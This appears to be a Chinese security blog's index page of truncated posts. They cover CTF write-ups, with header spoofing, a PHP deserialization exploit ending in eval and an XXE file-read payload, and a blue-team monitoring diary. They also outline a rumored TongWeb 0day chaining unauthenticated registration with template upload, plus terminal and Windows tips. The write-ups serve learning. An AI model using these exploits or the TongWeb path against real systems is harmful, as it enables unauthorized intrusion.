lan1ocのblog

签到题hello CTFer给了个url，直接打开就有flag 然后提交就完了 WEBhttp下载一个叫WSRX的客户端连接一下开环境以后给的地址 然后访问localhost:64824 然后就是完成这些任务，1、2有手就行 5就是将ua头的值换成MoeBrowser就行 3是将cookie中的character的值改为admin就行 4是在数据包添加一个字段 1X-Forwarded-For: 127.0.0.1 然后所有任务完成，flag就出了 web入门指北题目显示要解码得flag 先把附件下载下来看看，解压完是个pdf文档 文档最后发现了一组神秘数字，要解码的应该就是这个了 一眼十六进制，那就转字符一下，写个脚本 1234567891011original_hex_string = "66 6c 61 67 3d 62 57 39 6c 59 33 52 6d 65 33 63 7a 62 45 4e 76 62 57 56 66 56 47 39 66 62 57 39 6c 51 31 52 47 58 31 63 79 59 6c...

前言初赛名次14，太爽了，被带飞了属于是，web都是做到最后几步出不来丢给大爹🤣🤣🤣 解题情况 解题过程Web1.ezphpPHP反序列化，var_dump触发BBB，通过BBB中的param1触发CCC，通过CCC中的$this->func->aaa()触发AAA执行任意代码 exp如下 1234567891011121314151617181920212223242526272829303132333435363738394041424344<?phphighlight_file(___FILE___); class AAA{    public $cmd;     public function __call($name, $arguments){        eval($this->cmd);         return "done";    } }class BBB{    public $param1;     public function...

前言残缺的队伍配上不好打的比赛😥 webweb-1直接看源码 1view-source:http://139.224.232.213:30333/ 1flag{2cfde35c1735cb1abfa071e7c982659907ffd9cd} 12奇葩的环境，一开始一直拒绝连接，开都开不起来，又是抢不到血的一场比赛😅 web-2看网页源码易知是xxe漏洞然后经过尝试，报错得到flag 1234567891011121314<?xml version="1.0" ?><!DOCTYPE message [ <!ENTITY % local_dtd SYSTEM "file:///usr/share/xml/fontconfig/fonts.dtd"> <!ENTITY % expr 'aaa)> <!ENTITY &#x25; file SYSTEM "file:///flag"> ...

发现一个攻击ip了告警一直在进行扫描微步查了近期攻击行为也较多唉通知客户了，可是还没封，我这就管个态势，我封他也没用啊。。。。 无结果啥都没发现啊其他的一点连不上 同事讨论原来不止我一人这样啊，我是第四天才看到扫描类的告警，有的同事基本都没看到过求干奥，真的求干奥，能不能卖力点 ps：有攻击队被同事溯源了，真的难绷 排名倒一不对劲啊，我这今天才看到明确攻击行为的告警，怎么我们市倒一，额。。。。应该不是我的责任吧。。。。。真没啥告警啊 不敢求干了，怎么倒一了，真的啥也没看到啊，可疑的也摇人分析了，唉 之前遇到的奇怪的错误堆栈信息的包终于看到一个比较完整的了 12345678910111213141516171819202122232425262728293031323334353637383940414243444546474849505152535455565758596061626364656667686970717273747576--fe7bae61-bea2-4b14-84e7-e73981c5fd4c Content-Disposition: form-data;...

又都是误报，相关群里说了开放政务网攻击，但是总结的攻击ip还是一条都没发现嗯，依旧风平浪静 奇怪的误报包跟同事讨论后觉得应该是正常业务包，告警类型是但是传了个二进制数据，匹配到了or关键字但是服务端什么回显都没有请求的路径是不是很看得懂，ai分析是说推测为Trend Micro OfficeScan的文件上传接口搞不懂，应该不是攻击，反正也通报客户注意了

风平浪静SIP的告警显示好怪啊，设置自动刷新了，有时候没刷新，然后有时候我刷新了没反应，后面刷出来了，发现是几分钟前了，但那个时候我都刷过了。。。。。。 奇怪的包昨天就注意到了，一个可能是上传文件的包？毕竟服务端回显上传文件成功，也给了路径但我看请求体全是错误堆栈信息，好像还是手机传的，告警显示如下我觉得应该是误报，匹配到了这个关键字标红的信息除了有个资产ip，其他也没啥都是错误堆栈信息，问了同事，讨论后决定应该是误报，再观察吧

用的是深信服的态势感知SIP误报误报很多，明确的攻击行为没怎么检测到不要自己吓自己，多查 疑似攻击事件态感的告警类型的是通用系统代码注入源ip和代理ip查了下微步全红，然后看日志，没怎么分析出，感觉就像是一个员工通过vpn远程访问内网的操作，但是最后的数据包，服务端回显了一个jwt认证值，解不出来，没有密钥，和同事讨论了下，说可能是攻击主要是客户那边一直不回啊，不知道是正常业务还是啥，不敢直接封禁 终于是回复了，最后是讨论了之后，由他那边让防火墙直接封禁这个ip

昨晚爆0day了今早同事发了个存疑的包，只能参考，zip包还不知道是否要特殊构造 1234567据小道消息tongweb有这么个洞/thirdParty/bind任意用户注册，包发过去，会返回accesstoken（JSESSIONID），拿token打上传{"username":"userxxxx","loginway": 1, "loginType": "xxx", "thirdId": "abcdefg”}上传接口/cmsmanager/template/import 12345678910111213141516171819202122232425262728POST /cmsmanager/template/import?isCover=1 HTTP/1.1Host: Connection: keep-aliveContent-Length: 203Cache-Control: max-age=0sec-ch-ua:...

warp一款牛逼的带ai的终端，但目前感觉也不算太牛逼，可能没找对用法，毕竟tabby用习惯了 ssh免密并自动warpifyssh免密这个不用说了，直接启动ai帮你搞就行了，free版每天有150次对话机会自动warpify就在第一次ssh连接时，运行 12echo -e '\n# Auto-Warpify for Warp\nif [[ "$-" == *i* ]]; then\n printf '\''\eP$f{"hook":"SourcedRcFileForWarp","value":{"shell":"bash","uname":"'"$(uname)"'"}}\x9c'\''\nfi\n' >> ~/.bashrc 1source...

问题情景每次打开新应用或者切应用要输入时，输入法就卡住，半天才能显示出来 分析临时文件过多 解决：清理 TMP 临时文件1cd "$env:AppData\Microsoft\InputMethod\Chs" 临时文件一眼望不到头啊，直接删 1Remove-Item -Path '*.tmp' -Force 关删除都删了一分半多，并且随时就能产生一堆临时文件啊还是要定期清理啊，写个计划任务吧先写个清理脚本1.ps1 12# Delete all .tmp files under IME cache pathRemove-Item -Path "$env:AppData\Microsoft\InputMethod\Chs\*.tmp" -Recurse -Force -ErrorAction SilentlyContinue win+r->taskschd.msc就启动的时候清理一次算了然后填刚刚写的那个脚本 1-ExecutionPolicy Bypass -WindowStyle Hidden -File...